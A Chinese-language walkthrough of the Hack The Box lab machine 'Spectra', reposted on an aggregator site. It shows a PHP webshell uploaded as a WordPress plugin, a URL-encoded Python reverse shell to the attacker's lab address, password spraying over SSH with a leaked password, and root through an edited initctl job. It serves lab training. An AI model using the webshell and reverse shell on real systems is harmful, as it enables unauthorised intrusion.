Linux/Spectra

Enumeration

nmap

第一次扫描发现系统对外开放了22,80和3306端口,端口详细信息如下

22端口运行着ssh,80端口还是http,不过不同的是打开了mysql的3306端口 TCP/80

进入首页,点击链接时,提示域名不能解析,需要在/etc/hosts中添加

10.10.10.229 spectra.htb

配置好后,点击Software Issue Tracker跳转到/main,可以看到该网站使用了wordpress

另一个链接Test会跳转至/testing/index.php,网站无法连接,显示数据库链接错误

直接访问/testing,会列出其他目录,但是wp-config.php文件似乎在服务器上使用nano编辑过,生成了.save文件

点击该文件并没有什么显示,但是查看源代码会展现很多内容,其中包括了wordpress的数据库信息

回到刚刚的/main页面,在页面底部有login链接,但是使用刚刚获取的用户名密码显示用户名无效

但是,使用administrator:devteam01却成功登录wordpress系统

Foothold

登录到wordpress后台

可以上传一个php文件作为新的插件

<?php
/*
Plugin Name: vegetable Plugin Version: 1.0.0
Author: vegetable Author URI: wordpress.org License: GPL2
*/
system($_REQUEST["cmd"]); ?>

将该php文件添加至zip

在wordpress后台,选择plugins→add new

然后选择刚才创建的shell.zip,再点击install now

跳转页面后再点击activate plugin

然后可以在插件列表中看到刚刚上传的插件

然后可以验证webshell是否成功上传

可以利用反向shell连接

访问

http://spectra.htb/main/wp-content/plugins/shell/shell.php?cmd=python%20-

c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.3%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

nc会监听到一个反向shell

升级shell

Lateral Movement

枚举系统发现了Chrome Os

Chrome OS 会将交互式登录用户的配置文件文件夹存储在/home/user/,但是却无法进入该文件

在/opt目录下有一个autologin.conf.prig

该脚本给出两条路径,但只有一个存在,其中的passwd文件似乎保存了一个密码

然后发现能登录的用户只有这几个

将这几个用户保存到一个文件中,形成用户名字典,然后利用crackmapexec程序看看哪个能成功登陆

crackmapexec ssh 10.10.10.229 -u user -p 'SummerHereWeCome!!' --continue-on-success

可以使用katie:SummerHereWeCome!!通过ssh登录系统

Privilege Escalation

使用sudo -l发现可以执行initctl,是init守护进程控制工具

使用id命令发现katie属于developers组

尝试搜索该组拥有的文件

test*.conf都是一样的

node.js文件来启动一个web

将/etc/init/test.conf的内容修改为

然后执行sudo initctl start test

之后,会在/tmp/vegetable中写入id,证明命令被执行

则可以往脚本中添加反向shell脚本

script exec id > /tmp/vegetableexport HOME=/srv echo $$ > /var/run/nodetest.pidexec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js  end script

和刚才一样操作,之后就可以获取root权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/496292.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

幻兽帕鲁(Palworld 1.4.11.5.0)私有服务器搭建(docker版)

文章目录 说明客户端安装服务器部署1Panel安装和配置docker服务初始化设置设置开机自启动设置镜像加速 游戏服务端部署游戏服务端参数可视化配置 Palworld连接服务器问题总结 服务端升级&#xff08;1.5.0&#xff09; 说明 服务器硬件要求&#xff1a;Linux系统/Window系统&a…

Nginx反向代理ip透传与负载均衡

前言 上篇介绍了nginx服务器单向代理和动静分离等相关内容&#xff0c;可参考Nginx重写功能和反向代理-CSDN博客&#xff0c;这里就ip透传和负载均衡对nginx反向代理做进一步了解。 目录 一、客户端ip透传 1. 概述 2. 一级代理 2.1 图示 2.2 操作过程 3. 二级代理 3.…

Stable Diffusion 模型分享:【Checkpoint】YesMix(动漫、2.5D)

本文收录于《AI绘画从入门到精通》专栏,专栏总目录:点这里。 文章目录 模型介绍生成案例案例一案例二案例三案例四下载地址模型介绍 条目内容类型大模型基础模型SD 1.5来源

nginx 模块 高级配置

目录 一、高级配置 1.1. 网页的状态页 1.2.Nginx 第三方模块 ehco 模块 打印 1.3.变量 1.3.1 内置变量 1.3.2自定义变量 1.4.Nginx压缩功能 1.5.https 功能 1.6.自定义图标 一、高级配置 1.1. 网页的状态页 基于nginx 模块 ngx_http_stub_status_module 实现&…

stm32学习笔记:ADC

1 ADC简介 ADC的作用ADC就是一个电压表&#xff0c;把引脚的电压值测出来&#xff0c;放在一个变量里 DAC的作用信号发生器、音频解码芯片 ADC的两个关键参数&#xff1a; 1、分辨率&#xff0c;一般用多少位来表示&#xff0c;12位AD值&#xff0c;它的表示范围就是0~2^12-1&…

一文读懂什么是 OCR 识别

在数字化时代&#xff0c;信息处理和数据管理是企业运营的重要环节。然而&#xff0c;手工输入信息存在效率低和准确性低的问题&#xff0c;严重影响了企业的工作流程和决策过程。因此&#xff0c;OCR&#xff08;Optical Character Recognition&#xff09;识别技术的应用变得…

目标跟踪之KCF详解

High-Speed Tracking with Kernelized Correlation Filters 使用内核化相关滤波器进行高速跟踪 大多数现代跟踪器的核心组件是判别分类器&#xff0c;其任务是区分目标和周围环境。为了应对自然图像变化&#xff0c;此分类器通常使用平移和缩放的样本补丁进行训练。此类样本集…

docker下gitlab安装配置

一、安装及配置 1.gitlab镜像拉取 docker pull gitlab/gitlab-ce:latest2.运行gitlab镜像 docker run -d -p 443:443 -p 80:80 -p 222:22 --name gitlab --restart always --privilegedtrue -v /home/gitlab/config:/etc/gitlab -v /home/gitlab/logs:/var/log/gitlab -v …

【软件测试】--功能测试4-html介绍

1.1 前端三大核心 html:超文本标记语言&#xff0c;由一套标记标签组成 标签&#xff1a; 单标签&#xff1a;<标签名 /> 双标签:<标签名></标签名> 属性&#xff1a;描述某一特征 示例:<a 属性名"属性值"> 1.2 html骨架标签 <!DOC…

Ubuntu20.04安装Carla0.9.15

文章目录 环境要求下载Carla解压Carla运行Carla测试官方用例创建python环境安装依赖包案例&#xff1a;生成车辆案例&#xff1a;测试自动驾驶 参考链接 环境要求 系统配置要求&#xff1a; 至少3G显存的GPU&#xff0c;推荐3060及以上的显卡进行Carla拟真。预留足够的硬盘空…

CS_上线三层跨网段机器(完整过程还原)

以前讲过用cs_smb_beacon上线不出网机器&#xff0c;但是真实的网络拓扑肯定不止这么一层的网络&#xff01; 所以我就来搭建一个复杂一点的网络环境&#xff01;&#xff01; 当然了&#xff0c;这三台电脑之间都是不同的网段&#xff0c;&#xff08;但是同属于一个域环境&a…

Acwing数学与简单DP(二)

摘花生 原题链接&#xff1a;https://www.acwing.com/problem/content/1017/ 最后一步&#xff0c;有两种可能&#xff1a; 从上面走从下面走 也就是max(dp[i-1][j],dp[i][j-1])&#xff0c;再加上最后一个位置的值。 #include"bits/stdc.h"using namespace std;i…